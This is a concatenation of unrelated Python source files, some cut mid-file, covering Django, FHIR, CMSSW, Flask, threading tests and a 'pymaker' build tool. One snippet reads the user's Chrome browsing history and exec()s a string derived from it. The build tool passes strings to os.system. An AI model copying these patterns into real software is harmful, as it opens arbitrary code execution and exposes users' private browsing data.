    messages.info(request, "Logged out successfully!")
    return redirect("home")
|
import Customer
class Order:
    """A single ordered product, identified by its name and code.

    Attributes:
        productname: the product's display name, stored as given.
        productcode: the product's code, stored as given (no validation).
    """

    def __init__(self, productname, productcode):
        self.productname = productname
        self.productcode = productcode

    def __repr__(self):
        # Debug-friendly representation; the original class had none.
        return (f"{type(self).__name__}(productname={self.productname!r}, "
                f"productcode={self.productcode!r})")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Time : 17-9-4 下午11:46
@Author : TangZongYu
@Desc :
"""
import jieba.posseg as pseg
# Segment a sample Chinese sentence and print each token together with its
# part-of-speech flag.
words = pseg.cut("想学习机器学习")
for word in words:
    # Python 3 print() call — the original used Python 2 print-statement
    # syntax ("print word,word.flag"), which is a SyntaxError on Python 3.
    print(word, word.flag)
# The list `values[low:high]` has `high - low` elements. For example,
# `values[1:4]` has the 3 elements `values[1]`, `values[2]`, and `values[3]`.
# Note that slicing never raises for an out-of-range `high`: if `high`
# exceeds `len(values)`, the slice is simply truncated, so the count
# `high - low` only holds when `high` is at most the length of `values`.
# Django shell session notes: exercises the stock app's models, the
# WorldTradingData wrapper, and FusionCharts time-series rendering.
from django.contrib.auth.models import User
from stock.models import Stock, Portfolio, StockSelection, Currency
from stock.forms import PortfolioForm
from django.contrib.auth.models import User  # NOTE(review): duplicate import
from stock import module_stock as ms
from pprint import pprint
# Look up a few known users and stocks to work with interactively.
bruno = User.objects.get(username='bvermeulen')
john = User.objects.get(username='johndean121')
default = User.objects.get(username='default_user')
apple = Stock.objects.get(symbol='AAPL')
slb = Stock.objects.get(symbol='SLB')
portfolio = Portfolio.objects.get(portfolio_name='Techno', user=default)
f = PortfolioForm(user=default, initial={'selected_portfolio':'Techno'})
# Fetch quotes for the portfolio and value it in EUR.
wtd = ms.WorldTradingData()
wtd.setup()
stocks = wtd.get_portfolio_stock_info(portfolio)
wtd.calculate_stocks_value(stocks, 'EUR')
import requests
from howdimain.utils.fusioncharts import FusionCharts, FusionTable, TimeSeries
# Pull FusionCharts' sample candlestick data/schema and build a chart.
data = requests.get('https://s3.eu-central-1.amazonaws.com/fusion.store/ft/data/stock-chart-with-volume_data.json').text
schema = requests.get('https://s3.eu-central-1.amazonaws.com/fusion.store/ft/schema/stock-chart-with-volume_schema.json').text
fusionTable = FusionTable(schema, data)
timeSeries = TimeSeries(fusionTable)
timeSeries.AddAttribute('caption', '{"text":"Apple Inc. Stock Price"}')
timeSeries.AddAttribute('subcaption', '{"text":"Stock prices from May 2014 - November 2018"}')
timeSeries.AddAttribute('chart', '{"exportenabled":1,"multicanvas":false,"theme":"candy"}')
timeSeries.AddAttribute('yaxis', '[{"plot":[{"value":{"open":"Open","high":"High","low":"Low","close":"Close"},"type":"candlestick"}],"format":{"prefix":"$"},"title":"Stock Price"},{"plot":[{"value":"Volume","type":"column"}],"max":"900000000"}]')
timeSeries.AddAttribute('navigator', '{"enabled":0}')
fcChart = FusionCharts("timeseries", "ex1", 700, 450, "chart-1", "json", timeSeries)
import stock.module_stock as ms
# Populate the stock table from the bundled WorldTradingData CSV.
ps = ms.PopulateStock()
ps.read_csv('stock/stock info/worldtradingdata-stocklist.csv')
ps.symbols()
|
# Copyright (c) 2009-2012 testtools developers. See LICENSE for details.
from unittest import TestSuite
def test_suite():
    """Aggregate the suites of every matcher test module into one TestSuite."""
    from testtools.tests.matchers import (
        test_basic,
        test_const,
        test_datastructures,
        test_dict,
        test_doctest,
        test_exception,
        test_filesystem,
        test_higherorder,
        test_impl,
    )
    sub_modules = (
        test_basic,
        test_const,
        test_datastructures,
        test_dict,
        test_doctest,
        test_exception,
        test_filesystem,
        test_higherorder,
        test_impl,
    )
    sub_suites = [module.test_suite() for module in sub_modules]
    return TestSuite(sub_suites)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.1-9346c8cc45 (http://hl7.org/fhir/StructureDefinition/SupplyDelivery) on 2020-02-03.
# 2020, SMART Health IT.
import sys
from dataclasses import dataclass, field
from typing import ClassVar, Optional, List
from .backboneelement import BackboneElement
from .codeableconcept import CodeableConcept
from .domainresource import DomainResource
from .fhirdate import FHIRDate
from .fhirreference import FHIRReference
from .identifier import Identifier
from .period import Period
from .quantity import Quantity
from .timing import Timing
@dataclass
class SupplyDeliverySuppliedItem(BackboneElement):
    """ The item that is delivered or supplied.

    The item that is being delivered or has been supplied.
    """
    resource_type: ClassVar[str] = "SupplyDeliverySuppliedItem"
    # Amount of the supplied item.
    quantity: Optional[Quantity] = None
    # The two item[x] representations are mutually exclusive (one_of_many):
    # provide either a coded concept or a reference, not both.
    itemCodeableConcept: Optional[CodeableConcept] = field(default=None, metadata=dict(one_of_many='item',))
    itemReference: Optional[FHIRReference] = field(default=None, metadata=dict(one_of_many='item',))
@dataclass
class SupplyDelivery(DomainResource):
    """ Delivery of bulk Supplies.

    Record of delivery of what is supplied.
    """
    resource_type: ClassVar[str] = "SupplyDelivery"
    # Business identifiers for this delivery.
    identifier: Optional[List[Identifier]] = None
    # Requests/events this delivery fulfils or is part of.
    basedOn: Optional[List[FHIRReference]] = None
    partOf: Optional[List[FHIRReference]] = None
    # Delivery status code (string per the generated FHIR binding).
    status: Optional[str] = None
    patient: Optional[FHIRReference] = None
    type: Optional[CodeableConcept] = None
    suppliedItem: Optional[SupplyDeliverySuppliedItem] = None
    # The three occurrence[x] representations are mutually exclusive
    # (one_of_many): a point in time, a period, or a timing schedule.
    occurrenceDateTime: Optional[FHIRDate] = field(default=None, metadata=dict(one_of_many='occurrence',))
    occurrencePeriod: Optional[Period] = field(default=None, metadata=dict(one_of_many='occurrence',))
    occurrenceTiming: Optional[Timing] = field(default=None, metadata=dict(one_of_many='occurrence',))
    # Parties involved in the delivery.
    supplier: Optional[FHIRReference] = None
    destination: Optional[FHIRReference] = None
    receiver: Optional[List[FHIRReference]] = None
import FWCore.ParameterSet.Config as cms
# configuration to model pileup for initial physics phase
from SimGeneral.MixingModule.mixObjects_cfi import theMixObjects
from SimGeneral.MixingModule.mixPoolSource_cfi import *
from SimGeneral.MixingModule.digitizers_cfi import *
# CMSSW MixingModule producer configured for a probability-function pileup
# distribution over 0-24 interactions per bunch crossing.
mix = cms.EDProducer("MixingModule",
    digitizers = cms.PSet(theDigitizers),
    LabelPlayback = cms.string(''),
    maxBunch = cms.int32(-2), ## all bunches come 75 ns early
    minBunch = cms.int32(-2), ## in terms of 25 nsec
    bunchspace = cms.int32(25), ##ns
    mixProdStep1 = cms.bool(False),
    mixProdStep2 = cms.bool(False),
    playback = cms.untracked.bool(False),
    useCurrentProcessOnly = cms.bool(False),
    input = cms.SecSource("EmbeddedRootSource",
        type = cms.string('probFunction'),
        # probValue[i] is the probability of probFunctionVariable[i] pileup
        # events; flat at 0.04593 for 0-20, tailing off for 21-24.
        nbPileupEvents = cms.PSet(
          probFunctionVariable = cms.vint32(0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24),
          probValue = cms.vdouble(0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.01965,0.00953,0.00440,0.00196),
          histoFileName = cms.untracked.string('histProbFunction.root'),
        ),
	sequential = cms.untracked.bool(False),
        fileNames = FileNames
    ),
    mixObjects = cms.PSet(theMixObjects)
)
|
# -*- coding: utf-8 -*-
# Django settings for truffe2 project.
from django.utils.translation import ugettext_lazy as _
from os.path import abspath, dirname, join, normpath
# Project root is one directory above this settings module.
DJANGO_ROOT = dirname(abspath(__file__)) + '/../'
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
    # ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/Zurich'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'fr-ch'
LANGUAGES = (
    ('en-us', _(u'Anglais')),
    ('fr-ch', _(u'Français')),
)
LOCALE_PATHS = (
    normpath(join(DJANGO_ROOT, 'locale')) + '/',
)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = normpath(join(DJANGO_ROOT, 'media')) + '/'
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = normpath(join(DJANGO_ROOT, 'static')) + '/'
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'impersonate.middleware.ImpersonateMiddleware',
    # Uncomment the next line for simple clickjacking protection:
    # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'app.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'app.wsgi.application'
# NOTE(review): there is no trailing comma after the single entry below, so
# TEMPLATE_DIRS is a plain string rather than a 1-tuple — confirm intended.
TEMPLATE_DIRS = (
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
    normpath(join(DJANGO_ROOT, 'templates')) + '/'
)
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.humanize',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'south',
    'bootstrap3',
    'impersonate',
    'multiselectfield',
    'easy_thumbnails',
    'jfu',
    'haystack',
    'celery_haystack',
    'truffe',
    'main',
    'users',
    'units',
    'rights',
    'communication',
    'notifications',
    'logistics',
    'accounting_core',
    'accounting_main',
    'accounting_tools',
    'members',
    'vehicles',
    'generic',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# Email the admins on unhandled request errors when DEBUG is False.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
ACTIVATE_RAVEN = False
AUTH_USER_MODEL = 'users.TruffeUser'
AUTHENTICATION_BACKENDS = ('app.tequila.Backend',)
LOGIN_URL = '/users/login'
TEQUILA_SERVER = 'https://tequila.epfl.ch'  # Url of tequila server
TEQUILA_SERVICE = 'Truffe2 - L\'intranet de l\'AGEPoly'  # Title used in tequila
TEQUILA_AUTOCREATE = True  # Auto create users ?
TEQUILA_FAILURE = '/users/login'  # Where to redirect user if there is a problem
LOGIN_REDIRECT_URL = '/'
BOOTSTRAP3 = {
    'jquery_url': '//code.jquery.com/jquery.min.js',
    'base_url': '//netdna.bootstrapcdn.com/bootstrap/3.0.3/',
    'css_url': None,
    'theme_url': None,
    'javascript_url': None,
    'horizontal_label_class': 'col-md-2',
    'horizontal_field_class': 'col-md-10',
}
IMPERSONATE_REQUIRE_SUPERUSER = True
DATETIME_FORMAT = "d.m.Y H:i:s"
# NOTE(review): duplicate of the USE_TZ setting above (same value).
USE_TZ = True
TEMPLATE_CONTEXT_PROCESSORS = ("django.contrib.auth.context_processors.auth",
                               "django.core.context_processors.debug",
                               "django.core.context_processors.i18n",
                               "django.core.context_processors.media",
                               "django.core.context_processors.static",
                               "django.core.context_processors.request",
                               "django.core.context_processors.tz",
                               "django.contrib.messages.context_processors.messages",
                               "app.utils.add_current_unit",
                               "app.utils.add_current_year",
                               "notifications.views.notifications_count",
                               )
LDAP = 'ldap://ldap.epfl.ch:389'
ROOT_UNIT_PK = 1
SYSTEM_USER_PK = 1572
PRESIDENT_ROLE_PK = 1
CS_ACCOUNT_NUMBER = "1020 -"  # Label of account for Credit Suisse
AUTO_RLC_UNIT_PK = 7  # The EPFL "Acces RLC" unit truffe's pk
AUTO_RLC_TAG = u"[Auto]"  # The tag to identify our accreds
AUTO_RLC_COMS_ROLES = [1, 3]  # The roles used to give access for commissions
AUTO_RLC_ROOT_ROLES = [1, ]  # The roles used to give access for root unit
AUTO_RLC_GIVEN_ROLE = 15
SOUTH_MIGRATION_MODULES = {
    'easy_thumbnails': 'easy_thumbnails.south_migrations',
}
SENDFILE_BACKEND = 'sendfile.backends.simple'
THUMBNAIL_PROCESSORS = (
    'easy_thumbnails.processors.colorspace',
    'app.utils.pad_image',
    'easy_thumbnails.processors.autocrop',
    'easy_thumbnails.processors.scale_and_crop',
    'easy_thumbnails.processors.filters',
)
NOTIFS_MAXIMUM_WAIT = 15  # In minutes, the maximum time before sending a notification
NOTIFS_MINIMUM_BLANK = 5  # In minutes, the minimum notification-free time before sending a notification
FORMAT_MODULE_PATH = 'app.formats'
HAYSTACK_CONNECTIONS = {
    'default': {
        'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
        'PATH': join(DJANGO_ROOT, 'whoosh_index'),
    },
}
HAYSTACK_SIGNAL_PROCESSOR = 'celery_haystack.signals.CelerySignalProcessor'
HAYSTACK_SEARCH_RESULTS_PER_PAGE = 25
HAYSTACK_MAX_SIMPLE_SEARCH_RESULTS = 100
WEBSITE_PATH = 'https://truffe2.agepoly.ch'
EMAIL_FROM = 'truffe2@epfl.ch'
# NOTE(review): re-raising the ImportError makes settingsLocal mandatory;
# this try/except behaves exactly like a plain import.
try:
    from settingsLocal import *
except ImportError:
    raise
if ACTIVATE_RAVEN:
    INSTALLED_APPS = INSTALLED_APPS + (
        'raven.contrib.django.raven_compat',
    )
|
if __name__ == '__main__':
    # Advent of Code 2021, day 2 (part 1): follow the submarine commands in
    # the file 'input' and print horizontal position * depth.
    depth = 0
    horizontal = 0
    # 'with' guarantees the file handle is closed (the original leaked it),
    # and the variable no longer shadows the builtin input().
    with open('input', 'r') as command_file:
        for line in command_file:
            (direction, amount) = line.split(' ')
            if direction == 'forward':
                horizontal += int(amount)
            elif direction == 'down':
                depth += int(amount)
            elif direction == 'up':
                depth -= int(amount)
    print(depth * horizontal)
|
import unittest
import heapq
import random
import threading
from garage.threads import utils
class UtilsTest(unittest.TestCase):
    """Unit tests for garage.threads.utils (AtomicInt, AtomicSet, Priority,
    name generation, and thread-local helpers)."""
    def test_atomic_int(self):
        # get_and_add returns the value *before* adding; get_and_set returns
        # the value before replacing it.
        i = utils.AtomicInt()
        self.assertEqual(0, i.get_and_add(0))
        self.assertEqual(0, i.get_and_add(1))
        self.assertEqual(1, i.get_and_add(2))
        self.assertEqual(3, i.get_and_add(3))
        self.assertEqual(6, i.get_and_add(4))
        self.assertEqual(10, i.get_and_add(0))
        self.assertEqual(10, i.get_and_set(-1))
        self.assertEqual(-1, i.get_and_set(2))
        self.assertEqual(2, i.get_and_set(0))
    def test_atomic_set(self):
        # check_and_add returns whether the element was already present.
        s = utils.AtomicSet()
        self.assertFalse('x' in s)
        self.assertFalse(s.check_and_add('x'))
        self.assertTrue('x' in s)
        self.assertFalse(s.check_and_add('y'))
        self.assertTrue('y' in s)
    def test_priority(self):
        # Priority keys must be hashable; LOWEST/HIGHEST are sentinels that
        # compare below/above every ordinary priority value.
        with self.assertRaises(AssertionError):
            utils.Priority([])  # Non-hashable!
        eq = self.assertEqual
        lt = self.assertLess
        gt = self.assertGreater
        test_data = [
            (eq, utils.Priority.LOWEST, utils.Priority.LOWEST),
            (gt, utils.Priority.LOWEST, utils.Priority('x')),
            (gt, utils.Priority.LOWEST, utils.Priority.HIGHEST),
            (eq, utils.Priority('x'), utils.Priority('x')),
            (lt, utils.Priority('x'), utils.Priority('y')),
            (gt, utils.Priority('x'), utils.Priority('w')),
            (lt, utils.Priority('x'), utils.Priority.LOWEST),
            (gt, utils.Priority('x'), utils.Priority.HIGHEST),
            (eq, utils.Priority.HIGHEST, utils.Priority.HIGHEST),
            (lt, utils.Priority.HIGHEST, utils.Priority('x')),
            (lt, utils.Priority.HIGHEST, utils.Priority.LOWEST),
        ]
        for assertion, left, right in test_data:
            assertion(left, right)
            # Hash must agree with equality.
            if assertion is eq:
                self.assertEqual(hash(left), hash(right))
            else:
                self.assertNotEqual(hash(left), hash(right))
    def test_priority_with_heap(self):
        # Priorities must sort correctly inside a heap, regardless of the
        # insertion order (hence the shuffles with a fixed seed).
        def heapsort(iterable):
            heap = []
            for value in iterable:
                heapq.heappush(heap, value)
            return [heapq.heappop(heap) for _ in range(len(heap))]
        random.seed(4)
        for expect in (
                [],
                [utils.Priority(0)],
                [utils.Priority.HIGHEST],
                [utils.Priority.LOWEST],
                [utils.Priority(0), utils.Priority(0)],
                [utils.Priority(0), utils.Priority(1)],
                [utils.Priority(0), utils.Priority.LOWEST],
                [utils.Priority.HIGHEST, utils.Priority(0)],
                [utils.Priority.HIGHEST, utils.Priority.LOWEST],
                [utils.Priority(0), utils.Priority(0), utils.Priority(0)],
                [utils.Priority(0), utils.Priority(1), utils.Priority(2)],
                [utils.Priority(0), utils.Priority(1), utils.Priority.LOWEST],
                [utils.Priority.HIGHEST, utils.Priority(0), utils.Priority(1)],
                [
                    utils.Priority.HIGHEST,
                    utils.Priority(0),
                    utils.Priority.LOWEST,
                ],
                ):
            actual = list(expect)
            random.shuffle(actual)
            actual = heapsort(actual)
            self.assertListEqual(expect, actual)
            actual = heapsort((reversed(expect)))
            self.assertListEqual(expect, actual)
    def test_generate_names(self):
        # Default format is '{name}-{serial:02d}' starting at 1; both the
        # format and the serial counter can be overridden.
        names = utils.generate_names(name='hello')
        self.assertEqual('hello-01', next(names))
        self.assertEqual('hello-02', next(names))
        self.assertEqual('hello-03', next(names))
        names = utils.generate_names(
            name_format='{string}-{serial}',
            string='hello',
            serial=utils.AtomicInt(0))
        self.assertEqual('hello-0', next(names))
        self.assertEqual('hello-1', next(names))
        self.assertEqual('hello-2', next(names))
    def test_make_get_thread_local(self):
        # They should access the same 'x'
        get_x_1 = utils.make_get_thread_local(
            'x', lambda: threading.current_thread().ident)
        get_x_2 = utils.make_get_thread_local(
            'x', lambda: self.fail('this should not be called'))
        def func(x_output):
            x_output.append(get_x_1())
            x_output.append(get_x_2())
        # Each thread sees its own value, initialized once per thread.
        t1_x = []
        t1 = threading.Thread(target=func, args=(t1_x,))
        t1.start()
        t2_x = []
        t2 = threading.Thread(target=func, args=(t2_x,))
        t2.start()
        t1.join()
        t2.join()
        self.assertEqual([t1.ident, t1.ident], t1_x)
        self.assertEqual([t2.ident, t2.ident], t2_x)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
import multiprocessing
import sys
import rumps
rumps.debug_mode(True)
from voiceplay import __title__ as vp_title
from voiceplay.cli.argparser.argparser import MyArgumentParser, Help
from voiceplay.logger import logger
from voiceplay.utils.updatecheck import check_update
from voiceplay.utils.crashlog import send_traceback
from voiceplay.utils.helpers import SignalHandler
from voiceplay.recognition.vicki import Vicki
from voiceplay.cli.console.console import Console
from voiceplay.utils.command import Command
from voiceplay.utils.helpers import ThreadGroup, cmp
class VoicePlayApp(rumps.App):
    """macOS menu-bar front-end for voiceplay, built on rumps.

    The rumps event loop runs on the main thread; the interactive console
    runs on a background ThreadGroup and talks to the player via a
    multiprocessing queue.
    """
    def __init__(self):
        # No default quit button: quitting must go through menu_quit so the
        # player and threads are shut down first.
        super(VoicePlayApp, self).__init__(vp_title, quit_button=None)
        self.menu = ['Pause/Resume', 'Quit']

    @rumps.clicked('Pause/Resume')
    def pause_resume(self, _):
        """Toggle playback by sending 'pause' to the console."""
        try:
            self.console.parse_command('pause')
        except Exception as exc:
            logger.error(repr(exc))

    @rumps.clicked('Quit')
    def menu_quit(self, _):
        """Shut down console, player and worker threads, then quit rumps."""
        try:
            self.console.set_exit()
            self.vicki.player.shutdown()
            self.th.stop_all()
        except Exception as exc:
            logger.error(repr(exc))
        rumps.quit_application()

    def player_console(self, vicki, queue=None):
        """
        Start VickiPlayer console: register command handlers, run the
        background queue consumer, and block in the interactive loop until
        the console exits.
        """
        helper = Help()
        #self.console = Console()
        self.console.add_handler(Command.PLAY, vicki.player.play_from_parser, Command().CONTROLS)
        self.console.add_handler('what', vicki.player.play_from_parser)
        self.console.add_handler('current_track', vicki.player.play_from_parser)
        helper.register(self.console)
        self.console.set_queue(queue)
        th = ThreadGroup(restart=False)
        th.targets = [self.console.run_bg_queue]
        th.start_all()
        self.console.run_console()
        self.console.set_exit()
        th.stop_all()

    def __run_console__(self):
        # Thread target: run the blocking console loop off the main thread.
        self.parser.player_console(self.vicki, queue=self.queue)

    def __run_bg__(self):
        # Spawn the console thread so rumps can keep the main thread.
        self.th = ThreadGroup(restart=False)
        self.th.targets = [self.__run_console__]
        self.th.start_all()

    def run_app(self):
        """Entry point: wire up signals, argument parsing, the player and the
        console, then hand control to the rumps event loop."""
        signal_handler = SignalHandler()
        signal_handler.register()
        message = check_update(suppress_uptodate=True)
        if message:
            logger.error(message)
        parser = MyArgumentParser(signal_handler=signal_handler)
        parser.configure()
        # first parse is just for debug
        result = parser.parser.parse_args(sys.argv[1:])
        debug = result.debug
        #
        rumps.debug_mode(debug)
        # NOTE(review): re-parses with '-c' (console mode) regardless of the
        # actual argv — confirm this override is intended.
        result = parser.parser.parse_args(['-c'])
        vicki = Vicki(debug=debug, player_backend=result.player_backend)
        vicki.player.player.set_argparser(result)
        #
        self.console = Console()
        #
        self.queue = multiprocessing.Queue()
        vicki.player.start()
        self.vicki = vicki
        self.parser = parser
        self.__run_bg__()
        self.run()
# Launch the menu-bar app when invoked as a script.
if __name__ == '__main__':
    VoicePlayApp().run_app()
|
from dataclasses import dataclass
from flask import Flask, render_template
@dataclass
class ErrorPage:
    """Declarative description of one HTTP error page."""
    # HTTP status code this page is registered for (e.g. 404).
    error_code: int
    # Short message shown on the page.
    message: str
    # Optional longer explanation; substituted with '' when left as None.
    long_message: str = None
class HttpErrorHandler:
    """Pre-renders one error page and serves it for its status code.

    Instances are callable: Flask invokes them as the registered error
    handler for ``error_page.error_code``.
    """

    def __init__(self, app: Flask, error_page: ErrorPage,
                 page_template_file: str, template_arguments=None):
        """Render the page once and register self as the handler.

        template_arguments: extra context merged into the template; defaults
        to no extra context. (The previous ``={}`` mutable default was a bug
        waiting to happen: one dict shared across all instances.)
        """
        if template_arguments is None:
            template_arguments = {}
        # Register this object to be a handler
        app.register_error_handler(error_page.error_code, self)
        # Render the template now so that we don't have to do it every time
        # that there is a request
        template_options = {
            'error_code' : error_page.error_code,
            'message' : error_page.message,
            **template_arguments
        }
        # The template always receives a string, never None.
        if error_page.long_message is None:
            template_options['long_message'] = ''
        else:
            template_options['long_message'] = error_page.long_message
        with app.app_context():
            self.rendered_template = render_template(page_template_file,
                                                     **template_options)

    def __call__(self, *args, **kwargs):
        """Return the pre-rendered page for any matching error."""
        return self.rendered_template
def create_http_error_handlers(app: Flask, error_pages: list,
                               page_template_file, **kwargs) -> None:
    '''Main entry point of this package.

    Registers one HttpErrorHandler on `app` for every ErrorPage in
    `error_pages`, all rendered from `page_template_file` (a file in the
    project's template folder that must expose every ErrorPage field).
    Any extra keyword arguments are forwarded to Flask's render_template().
    '''
    for error_page in error_pages:
        HttpErrorHandler(app, error_page, page_template_file, kwargs)
###########################################################################################
#created by : Naveen
#last modified :3/1/20
############################################################################################
import browserhistory as bh
import qr
def cf():
    """Take the first Chrome history record and display it via qr.view.

    Reads browser history with ``browserhistory``, stringifies Chrome's
    first record, extracts the first comma-separated field, and passes it
    to ``qr.view``.
    """
    history = bh.get_browserhistory()
    # (The original also called history.keys() here — a no-op; removed.)
    first_entry = str(history['chrome'][0])
    # The record was stringified as a tuple, so strip "('" and the trailing
    # "'" around the first field — presumably the URL; confirm against the
    # browserhistory record layout.
    first_field = first_entry.split(",")[0]
    url = first_field[2:][:-1]
    try:
        # SECURITY NOTE: exec() runs whatever string qr.view() returns.
        # Kept for compatibility, but this should become a direct call —
        # never exec() data derived from browsing history.
        exec(qr.view(url))
    except Exception:
        # Best-effort display: failures are ignored (original behavior,
        # minus the useless `q = bin(1)` assignment and the bare except).
        pass
|
"Pymaker, the better `make`"
__version__ = '0.0.1'
from importlib import import_module
from inspect import signature
from pathlib import Path
from pymaker.settings import cli_args
import argparse
import os
import subprocess
import sys
import pickle
from doc import doc
@doc
def r(s):
    """Run a shell command, echoing it first; return the exit status.

    Accepts either a list of argv tokens (run without a shell, safe) or a
    single command string (run through the shell).
    """
    if isinstance(s, list):  # isinstance, not `type(s) is list`
        print("Pymaker: " + " ".join(s))
        # List form avoids shell interpolation entirely.
        return subprocess.call(s)
    else:
        print("Pymaker: " + s)
        # SECURITY: the string form goes through the shell — prefer the
        # list form for anything containing untrusted input.
        return os.system(s)
@doc
class RecursiveDefinitionError(Exception):
    """Raised when a command's dependency chain includes itself."""
    pass
@doc
def declare_argument(*args, **kwargs):
    """Queue an argparse argument (same signature as add_argument) to be
    registered on the CLI parser when the tool's parser is built."""
    cli_args.append((args, kwargs))
@doc
def command(command, deps=()):
    """Decorator marking a function as a Makefile command.

    Usable as ``@command`` directly or as ``@command(name, deps)``.
    `command` is the command name (the function's own name is used when the
    argument is not a string); `deps` lists command names to run first.
    """
    def dec(fn):
        fn.command = command if isinstance(command, str) else fn.__name__
        fn.deps = deps
        fn.help = fn.__doc__
        # Commands declaring an `ns` parameter receive the parsed argparse
        # namespace when invoked.
        if 'ns' in signature(fn).parameters:
            fn.needs_namespace = True
        else:
            fn.needs_namespace = False
        return fn
    if callable(command):
        # Bare `@command` usage: `command` is the decorated function itself.
        # (This path used to crash because `deps` had no default value.)
        return dec(command)
    else:
        return dec
@doc
def build_direc(filename):
    """Import the Makefile module and return {command name: function}.

    `filename` (e.g. "Makefile.py") has its extension stripped to form the
    module name; the current directory is prepended to sys.path so the
    import resolves. Only callables tagged by @command are collected.
    """
    sys.path.insert(0, os.getcwd())
    module = import_module('.'.join(filename.split('.')[:-1]))
    return dict((fn.command, fn) for fn in module.__dict__.values() if callable(fn) and hasattr(fn, 'command'))
@doc
def call_command(command, direc, ns, _seen=None):
    """Run `command` from `direc`, running all of its dependencies first.

    Raises RecursiveDefinitionError on any dependency cycle. The original
    only caught a command depending directly on itself; `_seen` tracks the
    active recursion stack so indirect cycles (a -> b -> a) are detected
    instead of recursing forever. Callers should not pass `_seen`.
    """
    if _seen is None:
        _seen = set()
    fn = direc[command]
    if command in _seen or command in fn.deps:
        raise RecursiveDefinitionError(f"{fn.__name__}'s dependencies include {fn.__name__} itself.")
    _seen.add(command)
    for x in fn.deps:
        call_command(x, direc, ns, _seen)
    # Remove from the stack so shared (diamond) dependencies still run
    # once per path, exactly as before.
    _seen.discard(command)
    if fn.needs_namespace:
        fn(ns)
    else:
        fn()
@doc
def make_help_message(direc):
    """Compose the --help text for the positional `command` argument."""
    lines = [f"The command to run from the Makefile. This can be one of these elements: {', '.join(direc.keys())}.\n"]
    lines.extend(f' - {fn.command}: {fn.help}\n' for fn in direc.values() if fn.help)
    return ''.join(lines)
@doc
def main(filename="Makefile.py"):
    """Tool entry point: load the Makefile module, build the CLI, and run
    the requested command (plus its dependencies)."""
    direc = build_direc(filename)
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter,
        description="Pymaker, the better `make`",
    )
    # The single positional argument selects which command to run.
    parser.add_argument(
        "command",
        default=None,
        choices=direc.keys(),
        help=make_help_message(direc)
    )
    # Register any arguments the Makefile declared via declare_argument().
    for x, y in cli_args:
        parser.add_argument(*x, **y)
    args = parser.parse_args()
    call_command(args.command, direc, args)
if __name__ == '__main__':
    main()
|
# XXX: Make sure to import panda3d_kivy BEFORE anything Kivy-related
from panda3d_kivy.core.window import PandaWindow
from kivy.app import App as KivyApp
from kivy.base import runTouchApp
from kivy.lang import parser
class App(KivyApp):
    """Kivy App hosted inside a Panda3D display region.

